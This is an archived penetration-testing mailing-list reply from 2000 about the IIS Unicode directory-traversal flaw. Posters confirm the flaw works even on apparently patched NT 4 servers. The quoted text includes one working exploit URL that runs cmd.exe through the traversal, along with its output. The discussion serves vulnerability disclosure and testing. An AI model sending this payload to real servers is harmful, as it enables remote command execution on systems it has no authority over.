I can confirm that this works on a system that is supposedly patched.
Seems like there's somethin' strange going bump in the night.
> -----Original Message-----
> From: Unicraft Systems [mailto:unicraft_at_OTERO.CL]
> Sent: Wednesday, November 01, 2000 12:47 AM
> To: PEN-TEST_at_SECURITYFOCUS.COM
> Subject: Re: [PEN-TEST] IIS UNICODE Strings
>
>
> --- Virus checked / op virussen gecontroleerd ---
>
> It works for me too!!! =)
> This was tested in an NT 4 SP6 server.
>
>
> Regards,
> DonSata
>
> -----Original Message-----
> From: Penetration Testers
> [mailto:PEN-TEST_at_SECURITYFOCUS.COM]On Behalf Of
> Mike Ahern
> Sent: Tuesday, October 31, 2000 8:14 PM
> To: PEN-TEST_at_SECURITYFOCUS.COM
> Subject: Re: [PEN-TEST] IIS UNICODE Strings
>
> Vitaly Osipov [vos_at_TELENOR.CZ] wrote:
> Hmm... I see some *very* strange strings in you
> examples below... the second excaped symbol (%pc for
> example) is not real escaped hex-code -if it works,
> then the problem is not in Unicode at all, but in
> something else
> ---------------------------
>
>
> Trust Me, It Works!!! Which is interesting since at
> least one system reported as patched appears to be
> still vulnerable. I had assumed the admin either
> didn't patch, or used the wrong hotfix. Perhaps that
> is not the case...
>
> The Proof is in the Pudding:
> ----------------------------
>
> http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\
> Directory of c:\
> >
**********************************************************************
This email and any files transmitted with it are confidential and
intended solely for the use of the individual or entity to whom they
are addressed. If you have received this email in error please notify
the system manager.
This footnote also confirms that this email message has been swept by
MIMEsweeper for the presence of computer viruses.
www.mimesweeper.com
**********************************************************************
Received on Nov 02 2000
Intro
